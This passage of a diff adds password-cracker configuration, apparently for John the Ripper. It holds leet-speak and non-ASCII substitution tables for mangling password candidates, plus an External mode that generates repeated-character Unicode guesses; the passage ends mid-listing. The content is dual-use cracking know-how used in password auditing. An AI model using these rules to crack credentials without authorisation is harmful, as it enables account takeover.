+G=[gG9]
+H=[hH]
+I=[iI1!\|]
+J=[jJ]
+K=[kK]
+L=[lL1]
+M=[mM]
+N=[nN]
+O=[oO0]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS$5]
+T=[tT+7]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# Very strong elete.  MANY multi char eletes, AND some other more obsure ones.
+# a LOT of stuff here, BUT runs much much slower, since there are many more optional
+# values to try.
+# note contains ALL values from Rexgen.Alpha:leet2
+[List.Rexgen.Alpha:leet3]
+a=(a|/-\\|4|@)
+b=(b|\|3|\|o|8)
+c=[c\(<KS]
+d=(d|\|\)|o\||\|>|<\|)
+e=[e3]
+f=(f|ph|\|=)
+g=[g\(69]
+h=(h|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|1|!|\||\]\[)
+j=(j|_\|)
+k=(k|\|<|/<|\\<|\|\{)
+l=(l|1|\||\|_)
+m=(m|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|0|\(\)|\[\]|\{\})
+p=(p|\|2|\|D)
+q=(q|\(,\)|kw)
+r=(r|\|2|\|Z|\|?)
+s=[s$5]
+t=(t|+|'\]\['|7)
+u=(u|\|_\|)
+v=(v|\|/|\\\||\\/|/)
+w=(w|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|><|\}\{)
+y=(y|'/|`/|j)
+z=(z|2|\(\\\))
+A=(A|/-\\|4|@)
+B=(B|\|3|\|o|8)
+C=[C\(<KS]
+D=(D|\|\)|o\||\|>|<\|)
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G\(69]
+H=(H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(I|1|!|\||\]\[)
+J=(J|_\|)
+K=(K|\|<|/<|\\<|\|\{)
+L=(L|1|\||\|_)
+M=(M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(O|0|\(\)|\[\]|\{\})
+P=(P|\|2|\|D)
+Q=(Q|\(,\)|kw)
+R=(R|\|2|\|Z|\|?)
+S=[S$5]
+T=(T|+|'\]\['|7)
+U=(U|\|_\|)
+v=(V|\|/|\\\||\\/|/)
+W=(W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(X|><|\}\{)
+Y=(Y|'/|`/|j)
+Z=(Z|2|\(\\\))
+
+[List.Rexgen.Alpha:leet3_case]
+a=(a|A|/-\\|4|@)
+b=(b|B|\|3|\|o|8)
+c=[cC\(<KS]
+d=(d|D|\|\)|o\||\|>|<\|)
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG\(69]
+h=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|I|1|!|\||\]\[)
+j=(j|J|_\|)
+k=(k|K|\|<|/<|\\<|\|\{)
+l=(l|L|1|\||\|_)
+m=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|O|0|\(\)|\[\]|\{\})
+p=(p|P|\|2|\|D)
+q=(q|Q|\(,\)|kw)
+r=(r|R|\|2|\|Z|\|?)
+s=[sS$5]
+t=(t|T|+|'\]\['|7)
+u=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+w=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|X|><|\}\{)
+y=(y|Y|'/|`/|j)
+z=(z|Z|2|\(\\\))
+A=(a|A|/-\\|4|@)
+B=(b|B|\|3|\|o|8)
+C=[cC\(<KS]
+D=(d|D|\|\)|o\||\|>|<\|)
+E=[eE3]
+F=(f|F|PH|Ph|ph|\|=)
+G=[gG\(69]
+H=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(i|I|1|!|\||\]\[)
+J=(j|J|_\|)
+K=(k|K|\|<|/<|\\<|\|\{)
+L=(l|L|1|\||\|_)
+M=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(o|O|0|\(\)|\[\]|\{\})
+P=(p|P|\|2|\|D)
+Q=(q|Q|\(,\)|kw)
+R=(r|R|\|2|\|Z|\|?)
+S=[sS$5]
+T=(t|T|+|'\]\['|7)
+U=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+W=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(x|X|><|\}\{)
+Y=(y|Y|'/|`/|j)
+Z=(z|Z|2|\(\\\))
+
+[List.Rexgen.Alpha:ascii2nonascii]
+A=[ÀÁÂÃÄÅÆĀĂĄǍǞǠǺȀȂȦȺA]
+B=[ƁƂɃʙB]
+C=[ÇĆĈĊČƇȻC]
+D=[ÐĎĐƉƊƋǱǲD]
+E=[ÈÉÊËĒĔĖĘĚƎƏƐȄȆȨɆE]
+F=[ƑF]
+G=[ĜĞĠĢƓǤǦǴɢG]
+H=[ĤĦǶȞʜH]
+I=[ÌÍÎÏĨĪĬĮİƗǏȈȊɪI]
+J=[ĴƖɈJ]
+K=[ĶĸƘǨK]
+L=[£ĹĻĽĿŁȽʟL]
+M=[ƜM]
+N=[ÑŃŅŇŊƝǸȠɴN]
+O=[ÒÓÔÕÖØŌŎŐŒƆƟƠǑǪǬǾȌȎȪȬȮȰƢO]
+P=[ƤP]
+Q=[ɊQ]
+R=[®ŔŖŘƦȐȒɌʀʁʶR]
+S=[ŚŜŞŠƧȘS]
+T=[ŢŤƬƮȚȾT]
+U=[ÙÚÛÜŨŪŬŮŰŲƯǓǕǗǙǛȔȖɄU]
+V=[ɅV]
+W=[ŴW]
+Y=[¥ÝŶŸƳȲɎʏY]
+Z=[ŹŻŽƵȤZ]
+a=[àáâãäåæāăąǎǟǡǻȁȃȧɐɑɒa]
+b=[ƀƃɓb]
+c=[¢©çćĉċčƈȼɕc]
+d=[ðďđƌƍȡɖɗǳd]
+e=[èéêëēĕėęěǝȅȇȩɇɘəɚɛɜɝɞe]
+f=[ƒf]
+g=[ĝğġģǥǧǵɠɡg]
+h=[ħȟɥɦʮʯʰʱĥh]
+i=[ìíîïĩīĭįıǐȉȋɨi]
+j=[ĵǰȷɉɟʄʝʲj]
+k=[ķƙǩʞ]
+l=[ĺļľŀłƚƛȴɫɬɭl]
+m=[µɯɰɱm]
+n=[ñńņňŉŋƞǹȵɲɳn]
+o=[òóôõöøōŏőœơǒǫǭǿȍȏȫȭȯȱɵƣȣo]
+p=[ƥp]
+q=[ɋʠq]
+r=[ŕŗřȑȓɍɹɺɻɼɽɾɿʳʴʵr]
+s=[śŝşšſƨșȿʂs]
+t=[ţťŦŧƫƭțȶʇʈt]
+u=[ùúûüũūŭůűųưǔǖǘǚǜȕȗʉu]
+v=[ʌv]
+w=[ŵʍʷw]
+x=[×x]
+y=[ýÿŷƴȳɏʎʸy]
+z=[źżžƶȥɀʐʑz]
@@ -0,0 +1,1401 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Unicode (version 11) BMP version
+#
+# Number of candidates = 55,292 x max-length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Repeats16]
+int minlength, maxlength, maxc, length, c;
+int charset[0x10000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
